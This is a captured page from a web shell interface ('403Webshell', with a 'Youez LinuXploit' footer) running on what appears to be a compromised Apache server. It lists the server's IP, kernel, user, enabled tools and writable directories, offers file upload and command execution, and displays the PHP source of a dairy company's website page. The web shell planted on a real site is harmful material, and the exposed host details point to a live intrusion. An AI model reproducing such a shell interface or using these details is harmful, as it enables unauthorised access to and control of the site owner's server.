403Webshell
Server IP : 103.234.187.230  /  Your IP : 216.73.216.216
Web Server : Apache
System : Linux lserver42043-ind.megavelocity.net 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/rsdgroup/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/rsdgroup//static.php_____________9june2016
<?php
include_once("conf/settings.php");
include_once("conf/func.php");

$url=basename($_SERVER['REQUEST_URI'], '?' . $_SERVER['QUERY_STRING']);
$page=strtok($url,'.');
$getStaticPage		=	getStaticPageContentByPageKey("tbl_static_pages",$page);

if($getStaticPage['0']['staticTitle'])
{
	$page_id = 11;
	$history		=	getStaticPage("tbl_static_pages",$page_id);
	
	$page_id1 = 28;
	$brands		=	getStaticPage("tbl_static_pages",$page_id1);
	
	$page_id2 = 15;
	$strengths		=	getStaticPage("tbl_static_pages",$page_id2);
	
	$page_id3 = 29;
	$story		=	getStaticPage("tbl_static_pages",$page_id3);
	
	$page_id4 = 10;
	$chairmain_message		=	getStaticPage("tbl_static_pages",$page_id4);
}
?>
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title><?php if($getStaticPage[0]['metaTitle']==''){ echo "RSD"; }else{ echo $getStaticPage[0]['metaTitle']; } ?></title>
<meta name="Keywords" content="<?php if($getStaticPage[0]['metaKeywords']==''){ echo "RSD"; }else{ echo $getStaticPage[0]['metaKeywords']; } ?>">
<meta name="Description" content="<?php if($getStaticPage[0]['metaDescription']==''){ echo "RSD"; }else{ echo $getStaticPage[0]['metaDescription']; } ?>"> 

<link rel="stylesheet" href="css/style.css">
<link media="screen" rel="stylesheet" href="css/colorbox_new1.css" />

<script type="text/javascript" src="js/jquery-1.4.4.min.js"></script>
<!--[if lt IE 9]>
<script src="js/html5.js"></script>
<![endif]-->

<link rel="stylesheet" href="css/prettyPhoto.css" type="text/css" media="screen" title="prettyPhoto main stylesheet" charset="utf-8" />
<script src="js/jquery.prettyPhoto.js" type="text/javascript" charset="utf-8"></script>

<script src="js/jquery-ui.min.js"></script>
<script type="text/javascript" src="js/jquery.easing.1.3.js"></script>
<script type="text/javascript" src="js/jquery.mousewheel.min.js"></script>

</head>

<body>
    
<!--header start here-->  
<?php include_once("inc/header.php"); ?>
<!--header end here-->   

<!--section start here-->
<section>
<div class="braedcrumb"><a href="<?php echo $baseurl; ?>">Home</a>&nbsp;&nbsp;&gt;&nbsp;&nbsp;<span><?php echo ucwords(stripslashes($getStaticPage[0]['staticTitle']));?></span></div>
 <div class="ourPro">
    	<h3><?php echo ucwords(stripslashes($getStaticPage[0]['staticTitle']));?></h3>
        <?php echo stripslashes($getStaticPage[0]['staticDescription']);?>
		<div class="cl"></div>
    </div>
    
    <?php 
	 if($getStaticPage[0]['staticId'] == 2) { 
	?>
	
    <div class="graybg">
    	<div class="graybgIn">
        
        	<div class="aboutQuick">
            	<div class="aboutQuickIn">
                	<h2>History</h2>
                    <div class="imagebox"><img src="images/about_historyImg.png" alt="History"></div>
                    <p><?php echo substr(strip_tags($history['0']['staticDescription']),0,173);?> </p>
                    <a href="<?php echo $history['0']['pageKey']; ?>.html" class="viewmore"></a>
                </div>                
            </div>
            
            <div class="aboutQuick">
            	<div class="aboutQuickIn">
                	<h2>Our Brands</h2>
                    <div class="imagebox"><img src="images/about_brandImg.png" alt="Our Brands"></div>
                    <p><?php echo substr(strip_tags($brands['0']['staticDescription']),0,173);?> </p>
                    <a href="ananda.html" class="viewmore"></a>
                </div>                
            </div>
            
            <div class="aboutQuick">
            	<div class="aboutQuickIn">
                	<h2>Strengths</h2>
                    <div class="imagebox"><img src="images/about_strengthsImg.png" alt="Strengths"></div>
                    <p><?php echo substr(strip_tags($strengths['0']['staticDescription']),0,173);?> </p>
                    <a href="<?php echo $strengths['0']['pageKey']; ?>.html" class="viewmore"></a>
                </div>                
            </div>
            
            
            
        <div class="cl"></div></div>
    </div>
    
    
    
    
	<div class="morethan">
    	<h1>More than 26 Years of Success </h1>
        <p>Gopaljee story began in 1989 RSD (Gopaljee) Group, Gopaljee Dairy Foods, a leading dairy products brand in India is instrumental in providing dairy products at par with international standards. We focus on building leadership positions in branded and value added markets across the dairy sector. We at RSD Group foll...</p>
    </div>
    
    <div class="aboutcompany">
    	<div class="part1">
        	<div class="box1"></div>
            <div class="box2"></div>
            <div class="box3"></div>
        </div>
        
        <div class="part2">
        	<div class="box1"></div>
            <div class="box2"></div>
        </div>
    <div class="cl"></div></div>
    
    
    <div class="morethan morethanDevider">
    	<h1><?php echo $story['0']['staticTitle'];?></h1>
        <?php echo $story['0']['staticDescription'];?>
    </div>

    
     <?php 
	 if($chairmain_message['0']['staticDescription'])
	 {
	  echo $chairmain_message['0']['staticDescription'];
	 }
	 ?>
    
	<?php } ?>
     
<!--footer top start here-->
<?php include_once("inc/footer-top.php"); ?>
<!--footer top end here-->
   

</section>
<!--section end here-->


<!--footer start here-->
<?php include_once("inc/footer.php"); ?>
<!--footer end here-->
   
<script type="text/javascript">			
$(window).load(function() {
    mCustomScrollbars();
});

function mCustomScrollbars(){
/* 
malihu custom scrollbar function parameters: 
1) scroll type (values: "vertical" or "horizontal")
2) scroll easing amount (0 for no easing) 
3) scroll easing type 
4) extra bottom scrolling space for vertical scroll type only (minimum value: 1)
5) scrollbar height/width adjustment (values: "auto" or "fixed")
6) mouse-wheel support (values: "yes" or "no")
7) scrolling via buttons support (values: "yes" or "no")
8) buttons scrolling speed (values: 1-20, 1 being the slowest)
*/
$("#mcs3_container").mCustomScrollbar("vertical",900,"easeOutCirc",1.05,"auto","yes","no",0); 
}

/* function to fix the -10000 pixel limit of jquery.animate */
$.fx.prototype.cur = function(){
    if ( this.elem[this.prop] != null && (!this.elem.style || this.elem.style[this.prop] == null) ) {
      return this.elem[ this.prop ];
    }
    var r = parseFloat( jQuery.css( this.elem, this.prop ) );
    return typeof r == 'undefined' ? 0 : r;
} 	 
</script>
<script src="js/jquery.mCustomScrollbar.js"></script>
<script type="text/javascript" charset="utf-8">
$(document).ready(function(){
$("a[rel^='prettyPhoto']").prettyPhoto();
});
</script>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit